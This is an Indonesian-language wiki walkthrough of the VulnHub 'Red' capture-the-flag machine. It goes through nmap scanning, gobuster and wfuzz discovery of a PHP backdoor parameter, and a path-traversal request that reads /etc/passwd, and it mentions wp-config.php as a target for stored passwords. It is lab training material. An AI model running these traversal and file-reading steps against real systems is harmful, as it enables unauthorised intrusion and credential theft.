Difference between revisions of "CTF RED 1: Walkthrough"

Sumber: https://readysetexploit.gitlab.io/home/vulnhub/red/

nmap

Di kali linux. Cek IP address Kali Linux

hostname -I

192.168.0.156 fddc:e149:a774::5b6 fddc:e149:a774:0:f944:23ee:7982:825

Cari IP address Red

netdiscover -r 192.168.0.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                                                                                                       
19 Captured ARP Req/Rep packets, from 19 hosts.   Total size: 1140                                                                                        
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
.....                                                                            
192.168.0.155   08:00:27:89:06:41      1      60  PCS Systemtechnik GmbH                                                                                  
.....

Mac address 08:00:* PCS systemtechnik tampaknya adalah MAC dari VirtualBox. Maka IP address Red kita dapatkan.

Port Scan Target.

sudo nmap -v --min-rate 10000 192.168.0.155 | grep open

Discovered open port 22/tcp on 192.168.0.155
Discovered open port 80/tcp on 192.168.0.155
22/tcp open  ssh
80/tcp open  http

Lakukan full port scan

nmap -v -sV -sC -oN nmap 192.168.0.155 -p-

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 22:28 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating ARP Ping Scan at 22:28
Scanning 192.168.0.155 [1 port]
Completed ARP Ping Scan at 22:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:28
Completed Parallel DNS resolution of 1 host. at 22:28, 0.01s elapsed
Initiating SYN Stealth Scan at 22:28
Scanning 192.168.0.155 [65535 ports]
Discovered open port 22/tcp on 192.168.0.155
Discovered open port 80/tcp on 192.168.0.155
Completed SYN Stealth Scan at 22:28, 2.68s elapsed (65535 total ports)
Initiating Service scan at 22:28
Scanning 2 services on 192.168.0.155
Completed Service scan at 22:28, 13.24s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.155.
Initiating NSE at 22:28
Completed NSE at 22:28, 1.02s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.07s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Nmap scan report for 192.168.0.155
Host is up (0.000096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8d5365835252c4127249be335dd1e71c (RSA)
|   256 06610a49864364cab00c0f09177b33ba (ECDSA)
|_  256 9b8d90472ac1dc11287d57e08a23b469 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 5.8.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

NSE: Script Post-scanning.
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Initiating NSE at 22:28
Completed NSE at 22:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB) 

Hasilnya, target mempunya dua port yang terbuka,

   Port 22 running OpenSSH
   Port 80 running Apache HTTP

Kita tidak bisa berbuat banyak untuk SSH, oleh karena itu mari kita jajal web.

Web

Coba akses Web

http://192.168.0.155/

Tampaknya wordpress, tapi dengan kondisi di hack.

Lihat source web (CTRL-U) Di awal source page akan tampak

<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//redrocks.win' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hacked By Red » Feed" href="http://redrocks.win/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hacked By Red » Comments Feed" href="http://redrocks.win/comments/feed/" />

Tampaknya redrocks.win adalah web yang menarik. Kita perlu set /etc/hosts agar ada host redrocks.win

vi /etc/hosts

Isi dengan

192.168.0.155   redrocks.win
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Akses / Browse Web

http://redrocks.win/

Klik

Hello Blue!

Lihat source (CTRL-U). Ada clue menarik

• Ada kata2 "Looking For It?" kayanya seperti LFI - Local File Inclusion.
• Mr. Miessler yang mengupakan penulis Seclists di sebutkan.
• Juga di sebut "you won't be able to read anything"

Jika di satukan semua maka

• kemungkinan besar backdoor yang ada bukan shell backdoor biasa,
• tapi LFI.
• kemungkinan menggunakan PHP backdoors list karena WordPress berjalan di Apache PHP.

Coba di test menggunakan gobuster common PHP backdoors

apt update
apt -y install golang-go
go install github.com/OJ/gobuster/v3@latest
apt -y install gobuster

Coba ambil CommondBackdoors-PHP untuk di cek

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt

gobuster dir -w CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dir80.txt -z

Hasilnya,

===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://redrocks.win/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/02/10 01:54:59 Starting gobuster in directory enumeration mode
===============================================================
/NetworkFileManagerPHP.php (Status: 500) [Size: 0]
===============================================================
2023/02/10 01:55:12 Finished
===============================================================

Kita melihat ada file yang tidak normal NetworkFileManagerPHP.php

Local File Inclusion

cek di google keyword

NetworkFileManagerPHP.php

Hasilnya,

Mungkin maksud Anda adalah: Network File Manager PHP.php

webshells/NetworkFileManagerPHP.php at master - GitHub
https://github.com › BlackArch › webshells › blob › Netw...
Various webshells. We accept pull requests for additions to this collection. - webshells/NetworkFileManagerPHP.php at master · BlackArch/webshells.

Tampaknya sebuah webshell. Tapi berdasarkan hint yang kita miliki Red akan menggunakan LFI backdoor.

Kita perlu menginstalasi wordlist untuk mencek keyword yang bisa di pakai untuk attack. Hati-hati semakin besar wordlist / dictionary yang kita gunakan maka makin sulit melakukan wfuzz karena kemungkinan untuk timeout makin tinggi. Beberapa contoh instalasi wordlist adalah,

sudo apt -y install seclists

atau yang lebih lengkap

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
  && unzip SecList.zip \
  && rm -f SecList.zip

Atau kita bisa membuat file text berisi beberapa word yang mungkin bisa tembus sebagai keyword di wfuzz, misalnya

key
key1
coba
Attack
help

Mari cek menggunakan wfuzz,

wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt 

Hasilnya,

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload              
=====================================================================

000000017:   500        0 L      0 W        0 Ch        "ABBR"               
000000014:   500        0 L      0 W        0 Ch        "3DSecureStatus"     
000000016:   500        0 L      0 W        0 Ch        "A"                  
000000015:   500        0 L      0 W        0 Ch        "4"                  
000000013:   500        0 L      0 W        0 Ch        "3"                  
000000019:   500        0 L      0 W        0 Ch        "ACTION"             
000000003:   500        0 L      0 W        0 Ch        "12"                 
000000018:   500        0 L      0 W        0 Ch        "ACCESSLEVEL"        
000000001:   500        0 L      0 W        0 Ch        "1"                  
000000007:   500        0 L      0 W        0 Ch        "16"                 
000000012:   500        0 L      0 W        0 Ch        "23"                 
000000011:   500        0 L      0 W        0 Ch        "22"                 
000000006:   500        0 L      0 W        0 Ch        "15"                 
000000010:   500        0 L      0 W        0 Ch        "21"                 
000000002:   500        0 L      0 W        0 Ch        "11"                 
000000009:   500        0 L      0 W        0 Ch        "2"                  
000000008:   500        0 L      0 W        0 Ch        "17"                 
000000005:   500        0 L      0 W        0 Ch        "14"                 
000000004:   500        0 L      0 W        0 Ch        "13"                  

Lanjut perjuangan mencari key yang bisa dipakai untuk LFI. Coba,

wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hh 00
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hh 500
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hc 404
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hc 404,403,400,500
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --sc 200 -s 1 

Atau jika kita beruntung :) ...

wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/key.txt

Hasilnya,

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test
Total requests: 6

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                           
=====================================================================

000000001:   200        1 L      0 W        1 Ch        "key"                                                                                                                                                             
000000002:   500        0 L      0 W        0 Ch        "key1"                                                                                                                                                            
000000004:   500        0 L      0 W        0 Ch        "Attack"                                                                                                                                                          
000000003:   500        0 L      0 W        0 Ch        "coba"                                                                                                                                                            
000000006:   500        0 L      0 W        0 Ch        "http://redrocks.win/NetworkFileManagerPHP.php?=test"                                                                                                             
000000005:   500        0 L      0 W        0 Ch        "help"                                                                                                                                                            

Total time: 35.85189
Processed Requests: 6
Filtered Requests: 0
Requests/sec.: 0.167355

Yang menarik adalah Response 200 - ternyata di peroleh dengan Payload "key". Jadi keyword yang bisa digunakan untuk melakukan LFI adalah "key".

Sesudah key di peroleh kita dapat browse ke web

view-source:http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../etc/passwd

Hasilnya,

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
ippsec:x:1001:1001:,,,:/home/ippsec:/bin/bash
oxdf:x:1002:1002:,,,:/home/oxdf:/bin/bash

Kita berhasil melakukan Local File Inclusion (LFI). Target yan kita serang tampaknya wordpress, biasanya kita ingin

• vulnerable code (jika memungkinkan)
• wp-config.php (yang menyimpan password)

Kita dapat meningkatkan seragan menggunakan Burp dan wfuzz

Referensi

• https://readysetexploit.gitlab.io/home/vulnhub/red/